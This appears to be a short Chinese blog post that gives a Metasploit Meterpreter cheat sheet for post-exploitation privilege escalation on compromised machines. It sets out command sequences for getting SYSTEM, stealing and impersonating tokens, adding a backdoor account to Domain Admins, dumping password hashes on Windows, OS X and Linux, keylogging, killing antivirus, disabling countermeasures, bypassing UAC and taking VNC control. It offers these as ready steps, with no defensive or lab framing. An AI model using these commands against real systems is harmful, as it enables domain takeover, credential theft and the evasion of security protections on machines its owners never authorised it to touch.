【干货】Metasploit 进一步提升内网权限

提权一般步骤

meterpreter> use priv
meterpreter> getsystem
meterpreter> ps
meterpreter> steal_token 1784
meterpreter> shell
net user msf msf /add /DOMAIN
net group "Domain Admins" msf /add /DOMAIN

获取hash 一般步骤

meterpreter> use priv
meterpreter> getsystem
meterpreter> hashdump

如果是在win2008 系统上:

meterpreter> run migrate
meterpreter> run killav
meterpreter> ps
meterpreter> migrate 1436
meterpreter> keyscan_start
meterpreter> keyscan_dump
meterpreter> keyscan_stop

使用Incognito 提权

meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> use priv
meterpreter> getsystem
meterpreter> list_tokens -u
meterpreter> impersonate_token IHAZSECURITY\\Administrator

查看保护机制并禁用之

meterpreter> run getcountermeasure
meterpreter> run getcountermeasure -h
meterpreter> run getcountermeasure -d -k

检查是否是虚拟机

meterpreter> run checkvm

转入命令行

meterpreter> shell

远程VNC 控制

meterpreter> run vnc

转入后台

meterpreter> background

Bypass UAC

meterpreter> run post/windows/escalate/bypassuac

OS X 系统上dump hash

meterpreter> run post/osx/gather/hashdump

Linux 系统上dump hash

meterpreter> run post/linux/gather/hashdump

 

点赞

发表评论

电子邮件地址不会被公开,只有你知道( ̄▽ ̄)"